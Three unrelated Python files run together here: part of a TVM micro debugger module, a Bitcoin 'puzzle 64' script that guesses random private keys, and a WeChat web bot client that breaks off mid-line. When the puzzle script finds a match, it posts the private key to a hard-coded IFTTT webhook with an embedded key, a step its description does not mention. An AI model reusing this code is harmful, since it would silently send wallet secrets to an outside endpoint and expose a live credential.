def _launch_debugger(debugger_factory_json):
launch_debugger(DebuggerFactory.from_json(debugger_factory_json))
@register_func("tvm.micro.debugger.stop_debugger")
def stop_debugger():
global GLOBAL_DEBUGGER
if GLOBAL_DEBUGGER is not None:
try:
GLOBAL_DEBUGGER.stop()
finally:
GLOBAL_DEBUGGER = None
class RpcDebugger(Debugger):
"""A Debugger instance that launches the actual debugger on a remote TVM RPC server."""
def __init__(self, rpc_session, factory, wrapping_context_manager=None):
super(RpcDebugger, self).__init__()
self._factory = factory
self.launch_debugger = rpc_session.get_function("tvm.micro.debugger.launch_debugger")
self.stop_debugger = rpc_session.get_function("tvm.micro.debugger.stop_debugger")
self.wrapping_context_manager = wrapping_context_manager
def start(self):
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__enter__()
try:
self.launch_debugger(self._factory.to_json)
except Exception:
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__exit__(None, None, None)
raise
try:
input("Press [Enter] when debugger is set")
except Exception:
self.stop()
raise
self._is_running = True
def stop(self):
try:
self.stop_debugger()
self._run_on_terminate_callbacks()
finally:
if self.wrapping_context_manager is not None:
self.wrapping_context_manager.__exit__(None, None, None)
|
puzzle64.py
|
# Bitcoin Puzzle 64 Random
# Made by Andrei Melek
# https://github.com/Xh0st/puzzle64
try:
import sys
import os
import time
import hashlib
import binascii
import multiprocessing
from multiprocessing import Process, Queue
from multiprocessing.pool import ThreadPool
import threading
import base58
import ecdsa
import requests
import random
# If required imports are unavailable, we will attempt to install them!
except ImportError:
import subprocess
subprocess.check_call(["python3", '-m', 'pip', 'install', 'base58==1.0.0'])
subprocess.check_call(["python3", '-m', 'pip', 'install', 'ecdsa==0.13'])
subprocess.check_call(["python3", '-m', 'pip', 'install', 'requests==2.19.1'])
import base58
import ecdsa
import requests
def work():
# low = 0x100 #L61
# high = 0x1ff
low = 0x8000000000000000 #L48
high = 0xffffffffffffffff
return str ( hex ( random.randrange( low, high ) ) )[2:]
#Number of zeros to be added
def generate_private_key():
val = work()
result = val.rjust(48 + len(val), '0') #total=64
return str(result)
def private_key_to_WIF(private_key):
var80 = "80" + str(private_key)
var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify(var80)).hexdigest())).hexdigest()
return str(base58.b58encode(binascii.unhexlify(str(var80) + str(var[0:8]))), 'utf-8')
def private_key_to_public_key(private_key):
sign = ecdsa.SigningKey.from_string(binascii.unhexlify(private_key), curve = ecdsa.SECP256k1)
key_bytes = binascii.hexlify(sign.verifying_key.to_string()).decode('utf-8')
key = ('0x' + binascii.hexlify(sign.verifying_key.to_string()).decode('utf-8'))
# Get X from the key (first half)
half_len = len(key_bytes) // 2
key_half = key_bytes[:half_len]
# Add bitcoin byte: 0x02 if the last digit is even, 0x03 if the last digit is odd
last_byte = int(key[-1], 16)
bitcoin_byte = '02' if last_byte % 2 == 0 else '03'
public_key = bitcoin_byte + key_half
return public_key
def public_key_to_address(public_key):
alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
count = 0; val = 0
var = hashlib.new('ripemd160')
var.update(hashlib.sha256(binascii.unhexlify(public_key.encode())).digest())
doublehash = hashlib.sha256(hashlib.sha256(binascii.unhexlify(('00' + var.hexdigest()).encode())).digest()).hexdigest()
address = '00' + var.hexdigest() + doublehash[0:8]
for char in address:
if (char != '0'):
break
count += 1
count = count // 2
n = int(address, 16)
output = []
while (n > 0):
n, remainder = divmod (n, 58)
output.append(alphabet[remainder])
while (val < count):
output.append(alphabet[0])
val += 1
return ''.join(output[::-1])
def get_balance(address):
return 8
# time.sleep(0.1) #This is to avoid over-using the API and keep the program running indefinately.
# try:
# response = requests.get("https://rest.bitcoin.com/v2/address/details/" + str(address))
# return float(response.json()['balance'])
# except:
# return -1
def data_export(queue):
while True:
private_key = generate_private_key()
public_key = private_key_to_public_key(private_key)
address = public_key_to_address(public_key)
data = (private_key, address)
queue.put(data, block = False)
def worker(queue):
while True:
if not queue.empty():
data = queue.get(block = True)
balance = get_balance(data[1])
process(data, balance)
def send3(private_key):
payload = { 'value1' : 'P', 'value2' : private_key, 'value3' : 'R3'}
requests.post("https://maker.ifttt.com/trigger/hmbt/with/key/d8gr-cI50XXn1WSEOHf64W", data=payload)
def process(data, balance):
private_key = data[0]
address = data[1]
puzzle = "16jY7qLJnxb7CHZyqBP8qca9d51gAjyXQN" #P64
if (address != puzzle):
print("\r.",end="")
# print('{0}'.format(2)), # end=""
# print("{:<34}".format(str(address)) + " : " + str(balance))
if (address == puzzle):
send3(private_key)
print("FFFFFFFFFFFFFFFFF")
file = open("found.txt","a")
file.write("address: " + str(address) + "\n" +
"private key: " + str(private_key) + "\n" +
"WIF private key: " + str(private_key_to_WIF(private_key)) + "\n" +
"public key: " + str(private_key_to_public_key(private_key)).upper() + "\n" +
"balance: " + str(balance) + "\n\n")
file.close()
def thread(iterator):
processes = []
data = Queue()
data_factory = Process(target = data_export, args = (data,))
data_factory.daemon = True
processes.append(data_factory)
data_factory.start()
work = Process(target = worker, args = (data,))
work.daemon = True
processes.append(work)
work.start()
data_factory.join()
if __name__ == '__main__':
try:
pool = ThreadPool(processes = multiprocessing.cpu_count()*2)
pool.map(thread, range(0, 4)) # Limit to single CPU thread as we can only query 300 addresses per minute
except:
pool.close()
exit()
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import random
import multiprocessing
import platform
import logging
from collections import defaultdict
from urlparse import urlparse
from lxml import html
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
FORWARD_TYPES = json.loads(os.environ.get('WEGRAM_FORWARD_TYPES', '[]'))
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
def _unicode_list(data):
rv = []
for item in data:
if isinstance(item, str):
item = item.decode('utf-8')
elif isinstance(item, list):
item = _unicode_list(item)
elif isinstance(item, dict):
item = _unicode_dict(item)
rv.append(item)
return rv
def _unicode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, str):
key = key.decode('utf-8')
if isinstance(value, str):
value = value.decode('utf-8')
elif isinstance(value, list):
value = _unicode_list(value)
elif isinstance(value, dict):
value = _unicode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # 好友
self.GroupList = [] # 群
self.GroupMemeberList = [] # 群友
self.PublicUsersList = [] # 公众号/服务号
self.SpecialUsersList = [] # 特殊账号
self.autoReplyMode = False
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # 同步最短时间间隔(单位:秒)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
def genQRCode(self):
if sys.platform.startswith('win'):
self._showQRCodeImg()
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
os.startfile(QRCODE_PATH)
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
print self.base_uri
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
if Contact['VerifyFlag'] & 8 != 0: # 公众号/服务号
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
elif Contact['UserName'] in SpecialUsers: # 特殊账号
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
elif Contact['UserName'].find('@@') != -1: # 群聊
ContactList.remove(Contact)
self.GroupList.append(Contact)
elif Contact['UserName'] == self.User['UserName']: # 自己
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'webpush.weixin.qq.com',
'webpush2.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush1.wechatapp.com',
# 'webpush.wechatapp.com'
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
# 计数器
self.media_count = self.media_count + 1
# 文件名
file_name = image_name
# MIME格式
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
# 微信识别的文档格式,微信服务器应该只支持两种类型的格式。pic和doc
# pic格式,直接显示。doc格式则显示为文件。
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
# 上一次修改日期
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
# 文件大小
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not work now for weixin haven't support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
# 现有群里面查不到
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # 自己
if id[:2] == '@@':
# 群
name = self.getGroupName(id)
else:
# 特殊账号
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 公众号或服务号
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 直接联系人
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 群友
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def formatMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content).decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
tree = html.fromstring(self._get(content))
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
msg = {
'type': 'group',
'group': groupName.strip(),
'from': srcName.strip(),
'to': dstName.strip() if dstName != 'GROUP' else '',
'body': content.replace('<br/>', '\n'),
'time': msg['raw_msg']['CreateTime'],
}
else:
msg = {
'from': srcName.strip(),
'to': dstName.strip(),
'body': content.replace('<br/>', '\n'),
'time': msg['raw_msg']['CreateTime'],
}
return _unicode_dict(msg)
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content).decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
tree = html.fromstring(self._get(content))
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
msg = {
'type': 'group',
'group': groupName.strip(),
'from': srcName.strip(),
'to': dstName.strip(),
'body': content.replace('<br/>', '\n'),
'time': None,
}
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
msg = {
'from': srcName.strip(),
'to': dstName.strip(),
'body': content.replace('<br/>', '\n'),
'time': None,
}
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = self._xiaodoubi(content) + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
# self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
# self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print '%s 发送了一张名片:' % name
print '========================='
print '= 昵称: %s' % info['NickName']
print '= 微信号: %s' % info['Alias']
print '= 地区: %s %s' % (info['Province'], info['City'])
print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
print '========================='
raw_msg = {
'raw_msg': msg,
'message': '名片: \n*昵称*: {}\n*微信号*: {}\n*地区*: {} {}\n*性别*: {}'.format(
info['NickName'],
info['Alias'],
info['Province'], info['City'],
['未知', '男', '女', ][info['Sex']]
),
}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {
'raw_msg': msg,
'message': '[动画表情]({})'.format(url),
}
self._showMsg(raw_msg)
# self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
print '========================='
print '= 标题: %s' % msg['FileName']
print '= 描述: %s' % self._searchContent('des', content, 'xml')
print '= 链接: %s' % msg['Url']
print '= 来自: %s' % self._searchContent('appname', content, 'xml')
print '========================='
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {
'raw_msg': msg,
'message': '{}: [{}]({}) '.format(
appMsgType[msg['AppMsgType']],
msg['FileName'],
msg['Url']
),
}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
# self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
if msgType in FORWARD_TYPES:
